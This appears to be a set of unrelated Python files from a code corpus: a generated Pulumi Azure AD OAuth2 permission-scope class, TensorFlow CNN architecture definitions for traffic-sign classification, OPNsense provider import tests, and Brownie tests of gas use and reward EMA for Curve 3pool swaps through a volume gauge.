:param pulumi.Input[str] user_consent_display_name: Display name for the delegated permission that appears in the end user consent experience.
:param pulumi.Input[str] value: The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApplicationOauth2PermissionScopeState.__new__(_ApplicationOauth2PermissionScopeState)
__props__.__dict__["admin_consent_description"] = admin_consent_description
__props__.__dict__["admin_consent_display_name"] = admin_consent_display_name
__props__.__dict__["application_object_id"] = application_object_id
__props__.__dict__["enabled"] = enabled
__props__.__dict__["is_enabled"] = is_enabled
__props__.__dict__["permission_id"] = permission_id
__props__.__dict__["scope_id"] = scope_id
__props__.__dict__["type"] = type
__props__.__dict__["user_consent_description"] = user_consent_description
__props__.__dict__["user_consent_display_name"] = user_consent_display_name
__props__.__dict__["value"] = value
return ApplicationOauth2PermissionScope(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminConsentDescription")
def admin_consent_description(self) -> pulumi.Output[str]:
"""
Delegated permission description that appears in all tenant-wide admin consent experiences, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_description")
@property
@pulumi.getter(name="adminConsentDisplayName")
def admin_consent_display_name(self) -> pulumi.Output[str]:
"""
Display name for the delegated permission, intended to be read by an administrator granting the permission on behalf of all users.
"""
return pulumi.get(self, "admin_consent_display_name")
@property
@pulumi.getter(name="applicationObjectId")
def application_object_id(self) -> pulumi.Output[str]:
"""
The Object ID of the Application for which this Permission should be created. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "application_object_id")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Determines if the permission scope is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "is_enabled")
@property
@pulumi.getter(name="permissionId")
def permission_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "permission_id")
@property
@pulumi.getter(name="scopeId")
def scope_id(self) -> pulumi.Output[str]:
"""
Specifies a custom UUID for the permission scope. If omitted, a random UUID will be automatically generated. Changing this field forces a new resource to be created.
"""
return pulumi.get(self, "scope_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Whether this delegated permission should be considered safe for non-admin users to consent to on behalf of themselves, or whether an administrator should be required for consent to the permissions. Defaults to `User`. Possible values are `User` or `Admin`.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userConsentDescription")
def user_consent_description(self) -> pulumi.Output[str]:
"""
Delegated permission description that appears in the end user consent experience, intended to be read by a user consenting on their own behalf.
"""
return pulumi.get(self, "user_consent_description")
@property
@pulumi.getter(name="userConsentDisplayName")
def user_consent_display_name(self) -> pulumi.Output[str]:
"""
Display name for the delegated permission that appears in the end user consent experience.
"""
return pulumi.get(self, "user_consent_display_name")
@property
@pulumi.getter
def value(self) -> pulumi.Output[str]:
"""
The value that is used for the `scp` claim in OAuth 2.0 access tokens.
"""
return pulumi.get(self, "value")
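The deprecated `is_enabled`/`permission_id` handling above follows a common renaming pattern: when the old name is supplied, emit a `DeprecationWarning` once and keep accepting the value. A stripped-down, SDK-free sketch of that pattern (hypothetical helper, not part of the generated module; the `True` default mirrors the documented `enabled` default):

```python
import warnings

def resolve_enabled(enabled=None, is_enabled=None):
    # Accept the deprecated name but warn; the new name wins if both are set.
    if is_enabled is not None:
        warnings.warn(
            "is_enabled is deprecated, use enabled instead", DeprecationWarning
        )
        if enabled is None:
            enabled = is_enabled
    # Fall back to the documented default of `true` when neither is given.
    return True if enabled is None else enabled
```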
# architectures.py (repo: cuckookernel/CarND-Traffic-Signs, license: MIT)
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 28 14:36:00 2018
@author: mrestrepo
"""
import tensorflow as tf
layer1_depth = 8
layer3_depth = 16
arch_lenet_8 = [ None, # index=0 won't be used
# layer 1 : conv2d
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 8), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
# layer 2 : max pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
# layer 3 : conv2d
{ 'type' : 'conv2d', 'W_pars' : (5, 5, layer3_depth), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
# layer 4 : max_pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu, 'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu, 'name' : 'fc2'},
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'logits' }
]
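# Because the layer specs above are plain dicts, output shapes can be checked
# without building a graph. A minimal tracer sketch (hypothetical helper, not
# part of the original project; assumes 'VALID' padding for conv2d, since the
# specs give none, and 'SAME' padding for max_pool as declared):

```python
def trace_shapes(arch, h=32, w=32, c=3):
    """Walk an architecture list like the ones above and return the
    (name, output shape) pair produced by each layer."""
    shapes = []
    flat = False
    for layer in arch[1:]:  # index 0 is unused by convention
        kind = layer['type']
        if kind == 'conv2d':
            kh, kw, depth = layer['W_pars']
            h, w, c = h - kh + 1, w - kw + 1, depth  # 'VALID' padding
        elif kind == 'max_pool':
            _, ph, pw, _ = layer['ksize']
            h, w = -(-h // ph), -(-w // pw)  # ceil division ('SAME' padding)
        elif kind == 'flatten':
            c, flat = h * w * c, True
        elif kind == 'fully_connected':
            c = layer['out_dim']
        # 'dropout' leaves the shape unchanged
        shapes.append((layer['name'], (c,) if flat else (h, w, c)))
    return shapes
```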
# The following yielded 93.17% with depth-3 images: Adam(lr=0.0005), batch_size=256, epoch=168
arch_3_3 = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu,
'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_1' },
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu,
'name' : 'fc2'},
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_2' },
{ 'type' : 'fully_connected', 'out_dim' : 43,
'nonlinear' : None, 'name' : 'logits' },
]
arch_3_3_b = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
#{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
# 'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu,
'name' : 'fc1'},
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_1' },
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu,
'name' : 'fc2'},
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_2' },
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'logits' }
]
arch_3_3_c = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 64), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu, 'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu, 'name' : 'fc2'},
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'fc3' }
]
arch_3_3_2fc = [ None, # index=0 won't be used
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv1'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p1' },
{ 'type' : 'conv2d', 'W_pars' : ( 3, 3, 32), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv2'},
{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
'padding' : 'SAME', 'name' : 'max_p2' },
{ 'type' : 'conv2d', 'W_pars' : ( 5, 5, 16), 'strides' : ( 1, 1, 1, 1),
'name' : 'conv3'},
# layer 4 : max_pool
#{ 'type' : 'max_pool', 'ksize' : (1, 2, 2, 1), 'strides' : (1, 2, 2, 1),
# 'padding' : 'SAME', 'name' : 'max_p3' },
# layer 5 : flatten
{ 'type' : 'flatten', 'name' : 'flat1'},
#layer 6 : fully_connected
#{ 'type' : 'fully_connected', 'out_dim' : 120, 'nonlinear' : tf.nn.relu, 'name' : 'fc1'},
#layer 7 : fully_connected
{ 'type' : 'fully_connected', 'out_dim' : 84, 'nonlinear' : tf.nn.relu, 'name' : 'fc2'},
{ 'type' : 'dropout', 'keep_prob_ph' : 'keep_prob', 'name' : 'dropout_1' },
#layer 8 : fully_connected - no relu afterwards
{ 'type' : 'fully_connected', 'out_dim' : 43, 'nonlinear' : None, 'name' : 'logits' }
]
# tests/test_provider_kradalby_opnsense.py
# (repo: mjuenema/python-terrascript, license: BSD-2-Clause)
# Automatically generated by tools/makecode.py (24-Sep-2021 15:23:52 UTC)
def test_provider_import():
import terrascript.provider.kradalby.opnsense
def test_resource_import():
from terrascript.resource.kradalby.opnsense import opnsense_firewall_alias
from terrascript.resource.kradalby.opnsense import opnsense_firewall_alias_util
from terrascript.resource.kradalby.opnsense import opnsense_wireguard_client
from terrascript.resource.kradalby.opnsense import opnsense_wireguard_server
def test_datasource_import():
from terrascript.data.kradalby.opnsense import opnsense_firewall_alias
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.kradalby.opnsense
#
# t = terrascript.provider.kradalby.opnsense.opnsense()
# s = str(t)
#
# assert 'https://github.com/kradalby/terraform-provider-opnsense' in s
# assert '0.0.2-pre' in s
# minos/__init__.py (repo: qorrect/sisy, license: Apache-2.0)
import os
HERMES_BASE_PATH = os.path.dirname(os.path.realpath(__file__))
PROJECT_BASE_PATH = os.path.dirname(os.path.realpath(__file__))
#!/usr/bin/python3
# tests/test_02_threepoolvolgauge.py (repo: taariq/volumegauge, license: Apache-2.0)
import pytest
PERIOD = 30
DENOMINATOR = 10 ** 18
SMOOTHING = 2
ALPHA = DENOMINATOR - SMOOTHING * DENOMINATOR / (PERIOD + 1)
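The constants above implement a fixed-point exponential moving average: the weight on new data is `SMOOTHING / (PERIOD + 1)` (the classic EMA factor), and `ALPHA` is the complementary retention weight scaled by `DENOMINATOR` so the filter can run on scaled integers. A standalone sketch of one update step; `ema_step` is an illustrative name, not part of the test suite:

```python
# Same constants as the test module, repeated so this sketch is self-contained.
PERIOD = 30
DENOMINATOR = 10 ** 18
SMOOTHING = 2
ALPHA = DENOMINATOR - SMOOTHING * DENOMINATOR / (PERIOD + 1)

def ema_step(last, current):
    """One EMA update; dividing by DENOMINATOR removes the fixed-point scale."""
    return (ALPHA * last + (DENOMINATOR - ALPHA) * current) / DENOMINATOR

# A constant series is a fixed point of the filter, and the weight on the
# new observation is 2 / (PERIOD + 1).
print(ema_step(100, 100))
```

In the tests themselves the division by `DENOMINATOR` is deferred: both `newvolume` and `newamount` carry the same scale, which cancels when their ratio is taken.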
def _run_exchange(volgauge, pool, token, tracker, accounts, i, j, decimals):
    """Swap coin index i -> j five times through the volume gauge and the
    bare pool, printing the gauge's gas overhead and reward bookkeeping."""
    amount = 50 * 10 ** decimals
    for attempt in range(5):
        print("Attempt #" + str(attempt + 1) + " .....")
        last_reward_amount = tracker.rewardAmount()
        tx = volgauge.exchange(i, j, amount, 0, {'from': accounts[0]})
        vgas = tx.gas_used
        print("VGaugeGas : " + str(vgas) + " Unit")
        tx = pool.exchange(i, j, amount, 0, {'from': accounts[0]})
        print("OriginGas : " + str(tx.gas_used) + " Unit")
        print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
        current_reward_amount = tracker.rewardAmount()
        last_volume, last_amount = tracker.lastVolumeData(token)[:2]
        current_volume, current_amount = tracker.currentVolumeData(token)[:2]
        # Fixed-point EMA of price-by-volume; the DENOMINATOR scale carried by
        # both terms cancels in the ratio.
        newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
        newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
        price_v_ema = newvolume / newamount
        print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
        print("reward_amount : " + str(current_reward_amount)
              + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
        print("increased_reward_amount_in_CRV : "
              + str((current_reward_amount - last_reward_amount) / DENOMINATOR)
              + " CRV")


def test_exchange_dai_to_usdc(_threepoolvolgauge, threepool, DAI, tracker, accounts):
    _run_exchange(_threepoolvolgauge, threepool, DAI, tracker, accounts, 0, 1, 18)


def test_exchange_usdc_to_dai(_threepoolvolgauge, threepool, USDC, tracker, accounts):
    _run_exchange(_threepoolvolgauge, threepool, USDC, tracker, accounts, 1, 0, 6)


def test_exchange_dai_to_usdt(_threepoolvolgauge, threepool, DAI, tracker, accounts):
    _run_exchange(_threepoolvolgauge, threepool, DAI, tracker, accounts, 0, 2, 18)


def test_exchange_usdt_to_dai(_threepoolvolgauge, threepool, USDT, tracker, accounts):
    _run_exchange(_threepoolvolgauge, threepool, USDT, tracker, accounts, 2, 0, 6)


def test_exchange_usdc_to_usdt(_threepoolvolgauge, threepool, USDC, tracker, accounts):
    _run_exchange(_threepoolvolgauge, threepool, USDC, tracker, accounts, 1, 2, 6)


def test_exchange_usdt_to_usdc(_threepoolvolgauge, threepool, USDT, tracker, accounts):
    _run_exchange(_threepoolvolgauge, threepool, USDT, tracker, accounts, 2, 1, 6)